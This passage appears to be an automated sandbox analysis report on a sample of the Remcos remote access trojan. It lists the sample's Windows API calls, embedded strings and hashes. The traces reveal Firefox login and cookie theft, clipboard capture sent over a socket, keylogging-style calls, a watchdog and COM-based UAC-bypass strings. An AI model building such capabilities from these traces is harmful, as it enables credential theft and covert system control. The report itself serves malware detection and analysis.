                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                  • API String ID: 2994406822-18413064
                                                  • Opcode ID: 7e6000a8a7e4ba05ca38dfd82d922d01f1a458e024efa59c1ff409d8a81639b8
                                                  • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                  • Opcode Fuzzy Hash: 7e6000a8a7e4ba05ca38dfd82d922d01f1a458e024efa59c1ff409d8a81639b8
                                                  • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                  • String ID: 86l$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-3917697039
                                                  • Opcode ID: 21d01479d8baf15edc850a14088899f8ff3ce0c4d1061f585db762b473695379
                                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                  • Opcode Fuzzy Hash: 21d01479d8baf15edc850a14088899f8ff3ce0c4d1061f585db762b473695379
                                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,`m,?,00475338), ref: 0040F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: 86l$C:\Program Files(x86)\Internet Explorer\$Inj$`m$ieinstal.exe$ielowutil.exe$xdF$xdF
                                                  • API String ID: 3756808967-2716700462
                                                  • Opcode ID: c575ac8939463ca684cedb7c6906afd83d502d5e5bbe83c4c666d8f6a0325efa
                                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                                  • Opcode Fuzzy Hash: c575ac8939463ca684cedb7c6906afd83d502d5e5bbe83c4c666d8f6a0325efa
                                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: 6c639a8cbac5ca484f8773e9da93299d118512ec2cf8b834913427766c983489
                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                  • Opcode Fuzzy Hash: 6c639a8cbac5ca484f8773e9da93299d118512ec2cf8b834913427766c983489
                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004168FD
                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID: !D@$xdF
                                                  • API String ID: 3520204547-3540039394
                                                  • Opcode ID: c8703224e175adb969da51eb5f57ffc5a40dfb1fd886196ce195493606c83552
                                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                                  • Opcode Fuzzy Hash: c8703224e175adb969da51eb5f57ffc5a40dfb1fd886196ce195493606c83552
                                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: ac2c58898ed4881048f14169fe64a4f28670cbea93e3b81032ca527b9b506f8a
                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                  • Opcode Fuzzy Hash: ac2c58898ed4881048f14169fe64a4f28670cbea93e3b81032ca527b9b506f8a
                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  • Opcode ID: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                                  • Opcode Fuzzy Hash: 33a11f1d8b65504666c7f3d6a65dc1c7f241de2952f14d7c983c905d35a598f5
                                                  • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                                  • API String ID: 0-1861860590
                                                  • Opcode ID: fa5d28c5653a06ee74d606b0804547a39682ca64517b0fde9ecd30e9690a319d
                                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                  • Opcode Fuzzy Hash: fa5d28c5653a06ee74d606b0804547a39682ca64517b0fde9ecd30e9690a319d
                                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C37D
                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C3AD
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C41F
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C42C
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C402
                                                  • GetLastError.KERNEL32(?,?,?,?,?,86l,004752F0,00000001), ref: 0041C44D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C463
                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C46A
                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,86l,004752F0,00000001), ref: 0041C473
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                  • String ID: 86l
                                                  • API String ID: 2341273852-404869436
                                                  • Opcode ID: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                  • Opcode Fuzzy Hash: 74fc921fbbcb6c35e60b9a8f4f047a03f237c0767a03969ab094381de9c75e57
                                                  • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                  APIs
                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: !D@$$aF$(aF$,aF$PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-3345310279
                                                  • Opcode ID: 5a67a4a310bbeab77cb956b6f29dad078fe7ead2311179410cf603bdc65d0c30
                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                  • Opcode Fuzzy Hash: 5a67a4a310bbeab77cb956b6f29dad078fe7ead2311179410cf603bdc65d0c30
                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040755C
                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
                                                  • Opcode ID: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                  • Opcode Fuzzy Hash: 117ce5ffae064854f49a167cf2fa86c02e7857af1ac0d1358aae668e1cde24ce
                                                  • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                  APIs
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                  • GetLastError.KERNEL32 ref: 0041A84C
                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                  • String ID:
                                                  • API String ID: 3587775597-0
                                                  • Opcode ID: a1aa029647e6b911d73bb73d0b4c014ff2ed4e84f9fda5b1c3cafc713725b12c
                                                  • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                  • Opcode Fuzzy Hash: a1aa029647e6b911d73bb73d0b4c014ff2ed4e84f9fda5b1c3cafc713725b12c
                                                  • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$CreateFirstNext
                                                  • String ID: 8SG$8eF$PXG$PXG$`m$NG
                                                  • API String ID: 341183262-2757713278
                                                  • Opcode ID: d5f9584296da29134bdb378f1823174ed51fd0316d44dec246f163996026ad68
                                                  • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                  • Opcode Fuzzy Hash: d5f9584296da29134bdb378f1823174ed51fd0316d44dec246f163996026ad68
                                                  • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 1164774033-405221262
                                                  • Opcode ID: 07425786a733f007aeb9a950477bd56cbd674cdc9204bf77bad9fc47ca870fce
                                                  • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                  • Opcode Fuzzy Hash: 07425786a733f007aeb9a950477bd56cbd674cdc9204bf77bad9fc47ca870fce
                                                  • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A451
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                                  • GetKeyboardState.USER32(?,?,004750F0), ref: 0040A479
                                                  • ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                  • ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID:
                                                  • API String ID: 1888522110-0
